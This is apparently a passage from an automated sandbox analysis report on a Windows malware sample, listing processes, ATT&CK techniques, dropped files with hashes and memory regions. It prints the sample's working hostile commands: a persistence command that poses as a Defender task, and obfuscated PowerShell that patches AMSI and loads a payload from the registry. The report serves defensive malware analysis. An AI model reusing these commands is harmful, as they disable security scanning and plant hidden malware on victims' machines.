  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5060 -ip 5060
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5048 -ip 5048
1⤵
PID:1900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:PhydHgIjVOid{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jssdryNrEwVPDL,[Parameter(Position=1)][Type]$uxwPmBDYfR)$BvVhKPyqzkF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+''+'l'+'e'+[Char](99)+'t'+'e'+''+[Char](100)+'Del'+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+'r'+'y'+'M'+[Char](111)+''+'d'+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+'T'+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+'a'+'l'+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+'C'+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$BvVhKPyqzkF.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$jssdryNrEwVPDL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+'d'+'');$BvVhKPyqzkF.DefineMethod('I'+'n'+'vo'+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+'t'+','+[Char](86)+'irt'+'u'+''+'a'+'l',$uxwPmBDYfR,$jssdryNrEwVPDL).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $BvVhKPyqzkF.CreateType();}$eMBvnKePNebXj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+'o'+'f'+[Char](116)+''+'.'+''+'W'+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](101)+''+[Char](77)+''+[Char](66)+''+'v'+''+[Char](110)+'K'+'e'+''+[Char](80)+''+[Char](78)+''+[Char](101)+''+'b'+''+[Char](88)+''+'j'+'');$pPUYDBuRXNuvud=$eMBvnKePNebXj.GetMethod(''+[Char](112)+'P'+[Char](85)+''+[Char](89)+''+[Char](68)+''+'B'+'u'+[Char](82)+'X'+[Char](78)+''+'u'+''+'v'+''+'u'+''+'d'+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](116)+'a'+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XtaYOrquykNKHTWzETQ=PhydHgIjVOid @([String])([IntPtr]);$JzLsnvMQRITuxRtzJFiuai=PhydHgIjVOid @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JACbbLpniuB=$eMBvnKePNebXj.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+'ne'+[Char](108)+'3'+[Char](50)+'.'+'d'+''+'l'+''+[Char](108)+'')));$pmwbVwbRocOKuU=$pPUYDBuRXNuvud.Invoke($Null,@([Object]$JACbbLpniuB,[Object](''+[Char](76)+''+'o'+''+'a'+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$kaAoIgIoBwHsZSHXU=$pPUYDBuRXNuvud.Invoke($Null,@([Object]$JACbbLpniuB,[Object](''+'V'+'irt'+'u'+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+'e'+[Char](99)+'t')));$VStuDER=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pmwbVwbRocOKuU,$XtaYOrquykNKHTWzETQ).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$QhuwLJlxuldcdalBu=$pPUYDBuRXNuvud.Invoke($Null,@([Object]$VStuDER,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$RXGeQjZRuc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kaAoIgIoBwHsZSHXU,$JzLsnvMQRITuxRtzJFiuai).Invoke($QhuwLJlxuldcdalBu,[uint32]8,4,[ref]$RXGeQjZRuc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$QhuwLJlxuldcdalBu,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kaAoIgIoBwHsZSHXU,$JzLsnvMQRITuxRtzJFiuai).Invoke($QhuwLJlxuldcdalBu,[uint32]8,0x20,[ref]$RXGeQjZRuc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+'W'+'A'+'R'+'E').GetValue('d'+'i'+''+[Char](97)+'l'+'e'+''+'r'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AvhqYYkzNWQU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UTniLNzvetFivY,[Parameter(Position=1)][Type]$LgaCCKALJZ)$fALehuVOCha=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+'eg'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType('M'+'y'+''+'D'+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+'y'+'p'+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+'i'+'c'+','+[Char](83)+'e'+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+'a'+[Char](115)+'s'+','+''+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$fALehuVOCha.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+'l'+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'id'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'ub'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UTniLNzvetFivY).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$fALehuVOCha.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+'e','Pu'+'b'+''+'l'+'ic'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'ByS'+[Char](105)+'g'+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+',Vir'+[Char](116)+''+[Char](117)+''+'a'+'l',$LgaCCKALJZ,$UTniLNzvetFivY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+'M'+'a'+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $fALehuVOCha.CreateType();}$OvyMHGoKvFOCF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'s'+[Char](116)+''+[Char](101)+'m.dl'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2'+'.'+''+'U'+''+[Char](110)+''+'s'+''+'a'+'f'+[Char](101)+''+'O'+''+[Char](118)+'y'+[Char](77)+''+'H'+'G'+'o'+'K'+[Char](118)+''+'F'+'O'+'C'+'F');$ayVuPlBzcMgpNp=$OvyMHGoKvFOCF.GetMethod(''+[Char](97)+''+[Char](121)+''+'V'+'uP'+[Char](108)+''+[Char](66)+'z'+'c'+''+'M'+'g'+'p'+''+'N'+''+[Char](112)+'',[Reflection.BindingFlags]''+[Char](80)+'u'+'b'+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ttknoDiPWYUaLjRkovY=AvhqYYkzNWQU @([String])([IntPtr]);$TCKNOJdNtmdTYEBzpSgvgi=AvhqYYkzNWQU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CxpxXFHuPAS=$OvyMHGoKvFOCF.GetMethod(''+[Char](71)+'et'+[Char](77)+'od'+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+'l32.'+'d'+''+[Char](108)+''+[Char](108)+'')));$jaqdRcJRbPKxvl=$ayVuPlBzcMgpNp.Invoke($Null,@([Object]$CxpxXFHuPAS,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+'L'+'i'+'br'+'a'+'r'+[Char](121)+'A')));$BnkSpoyxAyxWYLMOV=$ayVuPlBzcMgpNp.Invoke($Null,@([Object]$CxpxXFHuPAS,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+'r'+''+'o'+'t'+'e'+''+[Char](99)+'t')));$CvNeeUl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jaqdRcJRbPKxvl,$ttknoDiPWYUaLjRkovY).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$nMNLkpYZXMbcaHyGj=$ayVuPlBzcMgpNp.Invoke($Null,@([Object]$CvNeeUl,[Object]('A'+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$ItWxQvPPhk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BnkSpoyxAyxWYLMOV,$TCKNOJdNtmdTYEBzpSgvgi).Invoke($nMNLkpYZXMbcaHyGj,[uint32]8,4,[ref]$ItWxQvPPhk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nMNLkpYZXMbcaHyGj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BnkSpoyxAyxWYLMOV,$TCKNOJdNtmdTYEBzpSgvgi).Invoke($nMNLkpYZXMbcaHyGj,[uint32]8,0x20,[ref]$ItWxQvPPhk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('d'+[Char](105)+''+[Char](97)+''+'l'+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:828

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7b1dca17-abfd-44d6-a447-d32a22d414e6}
1⤵
PID:4932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scripting

T1064

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
be82966118350cdb0ace1adaf0c18051

SHA1
0cc2c2db307320e9ee0eee8be62f53e46fb9ff9a

SHA256
aebf98bf996c29177e81066b3c0a9003bc96b8b1a0e866fec7e29ccbd12dbaab

SHA512
3f5e587e8df90ef1b7e12154e033cd97c8432011311262ca3889e26e4519a641f7445b3ef20a6c832a3c5292aaa934bd701dd326cb5caeba85ed020f0df34b36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c697637a9b17f577fccd7e83a5495810

SHA1
04e6054584786b88994b0e0a871562227fe2a435

SHA256
54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164

SHA512
66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
674KB

MD5
e479ecb1802253a4c94767c8af306baf

SHA1
846bb5d88b91b8aa17bdb58eaf246b10e6586402

SHA256
b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

SHA512
b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
674KB

MD5
e479ecb1802253a4c94767c8af306baf

SHA1
846bb5d88b91b8aa17bdb58eaf246b10e6586402

SHA256
b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

SHA512
b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

Download Submit
memory/576-230-0x00007FFF4E310000-0x00007FFF4E320000-memory.dmp

Filesize
64KB

Download
memory/656-229-0x00007FFF4E310000-0x00007FFF4E320000-memory.dmp

Filesize
64KB

Download
memory/828-214-0x00007FFF6F850000-0x00007FFF70311000-memory.dmp

Filesize
10.8MB

Download
memory/828-223-0x00007FFF6F850000-0x00007FFF70311000-memory.dmp

Filesize
10.8MB

Download
memory/828-224-0x00007FFF8E290000-0x00007FFF8E485000-memory.dmp

Filesize
2.0MB

Download
memory/828-218-0x00007FFF8E290000-0x00007FFF8E485000-memory.dmp

Filesize
2.0MB

Download
memory/828-219-0x00007FFF8D840000-0x00007FFF8D8FE000-memory.dmp

Filesize
760KB

Download
memory/828-225-0x00007FFF8D840000-0x00007FFF8D8FE000-memory.dmp

Filesize
760KB

Download
memory/1172-196-0x0000000000000000-mapping.dmp

Download
memory/1404-165-0x0000000000000000-mapping.dmp

Download
memory/1564-195-0x0000000000000000-mapping.dmp

Download
memory/1588-208-0x0000024206CC9000-0x0000024206CCF000-memory.dmp

Filesize
24KB

Download
memory/1588-207-0x00007FFF6F560000-0x00007FFF70021000-memory.dmp

Filesize
10.8MB

Download
memory/1588-200-0x00007FFF6F560000-0x00007FFF70021000-memory.dmp

Filesize
10.8MB

Download
memory/1608-199-0x0000000000000000-mapping.dmp

Download
memory/2500-177-0x00000000055C0000-0x0000000005BD8000-memory.dmp

Filesize
6.1MB

Download
memory/2500-179-0x00000000050F0000-0x00000000051FA000-memory.dmp

Filesize
1.0MB

Download
memory/2500-212-0x0000000005480000-0x0000000005512000-memory.dmp

Filesize
584KB

Download
memory/2500-209-0x0000000005360000-0x00000000053D6000-memory.dmp

Filesize
472KB

Download
memory/2500-215-0x0000000006BE0000-0x0000000006C30000-memory.dmp

Filesize
320KB

Download
memory/2500-180-0x0000000005020000-0x000000000505C000-memory.dmp

Filesize
240KB

Download
memory/2500-213-0x0000000005540000-0x000000000555E000-memory.dmp

Filesize
120KB

Download
memory/2500-216-0x0000000006E00000-0x0000000006FC2000-memory.dmp

Filesize
1.8MB

Download
memory/2500-217-0x0000000007500000-0x0000000007A2C000-memory.dmp

Filesize
5.2MB

Download
memory/2500-171-0x0000000000000000-mapping.dmp

Download
memory/2500-172-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2500-178-0x0000000004FC0000-0x0000000004FD2000-memory.dmp

Filesize
72KB

Download
memory/2528-202-0x0000000000000000-mapping.dmp

Download
memory/2924-206-0x0000000000000000-mapping.dmp

Download
memory/3120-184-0x000001956F280000-0x000001956F29C000-memory.dmp

Filesize
112KB

Download
memory/3120-181-0x000001956D5D0000-0x000001956D5F2000-memory.dmp

Filesize
136KB

Download
memory/3120-193-0x00007FFF6F560000-0x00007FFF70021000-memory.dmp

Filesize
10.8MB

Download
memory/3120-192-0x000001956F3C0000-0x000001956F3CA000-memory.dmp

Filesize
40KB

Download
memory/3120-191-0x000001956F3B0000-0x000001956F3B6000-memory.dmp

Filesize
24KB

Download
memory/3120-185-0x000001956F360000-0x000001956F36A000-memory.dmp

Filesize
40KB

Download
memory/3120-186-0x000001956F390000-0x000001956F3AC000-memory.dmp

Filesize
112KB

Download
memory/3120-188-0x00007FFF6F560000-0x00007FFF70021000-memory.dmp

Filesize
10.8MB

Download
memory/3120-187-0x000001956F370000-0x000001956F37A000-memory.dmp

Filesize
40KB

Download
memory/3120-189-0x000001956F3D0000-0x000001956F3EA000-memory.dmp

Filesize
104KB

Download
memory/3120-190-0x000001956F380000-0x000001956F388000-memory.dmp

Filesize
32KB

Download
memory/3280-211-0x00007FF726311938-mapping.dmp

Download
memory/3360-201-0x0000000000000000-mapping.dmp

Download
memory/3396-204-0x0000000000000000-mapping.dmp

Download
memory/3676-169-0x0000000002229000-0x000000000272D000-memory.dmp

Filesize
5.0MB

Download
memory/3676-168-0x000000000273B000-0x0000000002878000-memory.dmp

Filesize
1.2MB

Download
memory/3676-167-0x0000000002229000-0x000000000272D000-memory.dmp

Filesize
5.0MB

Download
memory/3676-170-0x000000000273B000-0x0000000002878000-memory.dmp

Filesize
1.2MB

Download
memory/3676-162-0x0000000000000000-mapping.dmp

Download
memory/3976-203-0x0000000000000000-mapping.dmp

Download
memory/4004-198-0x0000000000000000-mapping.dmp

Download
memory/4748-205-0x0000000000000000-mapping.dmp

Download
memory/4884-139-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4884-133-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4884-132-0x0000000000000000-mapping.dmp

Download
memory/4932-228-0x00007FFF8D840000-0x00007FFF8D8FE000-memory.dmp

Filesize
760KB

Download
memory/4932-226-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/4932-227-0x00007FFF8E290000-0x00007FFF8E485000-memory.dmp

Filesize
2.0MB

Download
memory/4932-220-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/4932-221-0x0000000140002314-mapping.dmp

Download
memory/4972-146-0x0000000006620000-0x000000000663E000-memory.dmp

Filesize
120KB

Download
memory/4972-143-0x0000000005660000-0x0000000005682000-memory.dmp

Filesize
136KB

Download
memory/4972-155-0x0000000007BD0000-0x0000000007BEA000-memory.dmp

Filesize
104KB

Download
memory/4972-156-0x0000000007BC0000-0x0000000007BC8000-memory.dmp

Filesize
32KB

Download
memory/4972-145-0x0000000005FD0000-0x0000000006036000-memory.dmp

Filesize
408KB

Download
memory/4972-151-0x0000000007950000-0x000000000796A000-memory.dmp

Filesize
104KB

Download
memory/4972-152-0x00000000079C0000-0x00000000079CA000-memory.dmp

Filesize
40KB

Download
memory/4972-157-0x0000000007CE0000-0x0000000007D02000-memory.dmp

Filesize
136KB

Download
memory/4972-144-0x0000000005F60000-0x0000000005FC6000-memory.dmp

Filesize
408KB

Download
memory/4972-158-0x0000000008BC0000-0x0000000009164000-memory.dmp

Filesize
5.6MB

Download
memory/4972-154-0x0000000007B80000-0x0000000007B8E000-memory.dmp

Filesize
56KB

Download
memory/4972-153-0x0000000007C10000-0x0000000007CA6000-memory.dmp

Filesize
600KB

Download
memory/4972-142-0x00000000056D0000-0x0000000005CF8000-memory.dmp

Filesize
6.2MB

Download
memory/4972-141-0x0000000005060000-0x0000000005096000-memory.dmp

Filesize
216KB

Download
memory/4972-140-0x0000000000000000-mapping.dmp

Download
memory/4972-147-0x0000000006C00000-0x0000000006C32000-memory.dmp

Filesize
200KB

Download
memory/4972-148-0x0000000070520000-0x000000007056C000-memory.dmp

Filesize
304KB

Download
memory/4972-149-0x0000000006BE0000-0x0000000006BFE000-memory.dmp

Filesize
120KB

Download
memory/4972-150-0x0000000007F90000-0x000000000860A000-memory.dmp

Filesize
6.5MB

Download
memory/5048-159-0x0000000000000000-mapping.dmp

Download